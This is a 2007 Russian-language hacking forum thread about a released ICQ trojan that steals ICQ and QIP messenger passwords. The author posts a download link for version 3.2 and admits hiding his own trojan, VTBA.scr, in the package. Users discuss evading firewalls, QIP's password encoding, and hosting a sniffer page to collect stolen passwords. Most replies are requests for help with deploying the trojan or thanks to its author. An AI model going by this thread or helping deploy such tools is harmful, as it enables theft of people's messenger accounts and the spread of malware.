Релиз ICQ трояна. ver 2

Discussion in 'Skype, IRC, ICQ, Jabber и другие IM' started by А®ТеS, 16 Feb 2007.

  1. VladislavSmirnov

    VladislavSmirnov New Member

    Joined:
    16 Apr 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Палит файрволл... если закрыть доступ программе пишет все ту старую ошибку про " is not integer value.
     
  2. VladislavSmirnov

    VladislavSmirnov New Member

    Joined:
    16 Apr 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    нашел новый баг... в последней версии... пароли из под Qip выдирает не достаточно верно... а точнее уже у двух челов у которых Qip выдрал пароль, да не правильный...
     
  3. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    2 VladislavSmirnov
    Посмотри описание обновлений последней версии qip=\
     
    _________________________
    1 person likes this.
  4. rez@r

    rez@r New Member

    Joined:
    5 Mar 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Блин, народ , подскажите как установить-то этот TICQ2003Decrypt ?? открываю, я проэкт Project1.dpr нажимаю "add file to project" выбираю \troy\Component\ICQ2003Decrypt.pas так или как добовлять то ??
     
  5. Man9k

    Man9k Banned

    Joined:
    17 Oct 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    смотри тут как устанавливать компоненты на делфи, даже с картинками сделали=\
    зы гугль рулит :rolleyes:
     
  6. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Зделал новую версию 3.2. Пофиксены все извесные глюки, качаем тут - http://ggg123321.narod.ru/varlok_troy_3.2.rar
    З.Ы. вот что значит видеть в людях лучшее =). Указал свой мыльник и не так давно получил на него около 1000 флудеских писем, с мыла пришлось слесть...теперь контактов публиковать небуду.
     
    #46 А®ТеS, 10 Mar 2007
    Last edited: 10 Mar 2007
    1 person likes this.
  7. Tuborgi

    Tuborgi New Member

    Joined:
    10 Mar 2007
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    А®ТеS,автор,а как называеца тот самый файл в директории Trojan_Sources,который портит винду?и на скока сильно?и как избавляца от последствий?
     
  8. Dj Dg

    Dj Dg Banned

    Joined:
    2 Mar 2007
    Messages:
    4
    Likes Received:
    1
    Reputations:
    9
    Спасибо, классная трояна, автору + ..
     
  9. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    ДА про винду это стеб был ваще то =)))), там обычный троянец "под меня", называется VTBA.scr, выложен с целью сбора СТАТИСТИЧЕСКОЙ информации (а не паролей как думают некоторые =) ).
     
    1 person likes this.
  10. prox1kk

    prox1kk Elder - Старейшина

    Joined:
    23 Jan 2007
    Messages:
    21
    Likes Received:
    11
    Reputations:
    4
    Автору респект ;) жаль плюсик не могу поставить...
     
  11. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    *там обычный троянец "под меня", называется VTBA.scr, выложен с целью сбора СТАТИСТИЧЕСКОЙ информации (а не паролей как думают некоторые =) ).* /аха давай давай))......бугагагга

    а ваще так троянец норма))
     
  12. alex_d

    alex_d New Member

    Joined:
    5 Dec 2005
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Фигово что слишком большой размер троя, а также палится фаерволами. Хотеось бы узнать, он тащит пароли от Qip 8010?
     
  13. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4

    таЩит..у меня вот стаЩЩИл )))))) ... !
     
  14. alex_d

    alex_d New Member

    Joined:
    5 Dec 2005
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    И в каком он у тебя виде? Qip 8010 пароль сначала криптует, затем в base64, а потом уж в Hex. Что то я очень сомневаюсь что он тащит их в чистом виде, и что вобще он их тащит!
     
  15. 1nvesT

    1nvesT New Member

    Joined:
    18 Mar 2007
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Народ кому не трудно кто разобрался в трое напишите в IcQ 9643765 плюс подкину
     
  16. 1nvesT

    1nvesT New Member

    Joined:
    18 Mar 2007
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    ArTeS плиз как будеш свободен стукни в асю!
    и кстате вот что выхрдит при запуске троя вылазеет окошечко на сниф точней на loh.log пасы приходят от icq норм а от квипа 44494E41 вот такой пароль приходит поможите плиз !
     
    1 person likes this.
  17. alex_d

    alex_d New Member

    Joined:
    5 Dec 2005
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Значит Квип стоит 8010, а от него парои приходят не правильные, если ты напишешь тот пароль который пришел в Хексе то получишь начало названия компа! А вобще пока не видел не одного троя, пинча тянущего пароли от 8010. А во вторых, даже если ты и сможешь их вытащить, то они все равно шифрованы: сначала криптовка, затем base64, а потом Хексом! Я считаю что сейчас тащить пароли от асек не оправдано пинчем.... т.к у большинства народа стоит именно Квип, и чтобы достать и расшифровать пароли надо долго и много поработать :)!
     
  18. gormet

    gormet Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    38
    Likes Received:
    24
    Reputations:
    23
    надо за бугор двигать ентот трой - тама поди проканает)))))
     
  19. 3DViruzZ

    3DViruzZ Member

    Joined:
    16 Jan 2007
    Messages:
    24
    Likes Received:
    10
    Reputations:
    1
    насколько я понял троян не пукает фаер
    и не понятно как там с паролями от квипа 8010. лана, щас буду сам пробовать.
    автору респект. поставлю + при первой возможности

    P.S.:
    жжошь )
     
  20. Mosvit

    Mosvit Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    86
    Likes Received:
    16
    Reputations:
    1
    Подскажите правильно ли я делаю?
    1. Сначала я создаю сайт (на narod'e можно?), потом скидываю на него все файлы которые находятся в папке new_sniffer.
    2. Потом открываю с помощью делфи вот этот файл ICQ2003Decrypt.pas ?
    Что делать после этого, что надо изменять?

    А вообще если не трудно свяжитесь со мной по аське 218-239-500 , за мной +
     
    #60 Mosvit, 25 Mar 2007
    Last edited: 25 Mar 2007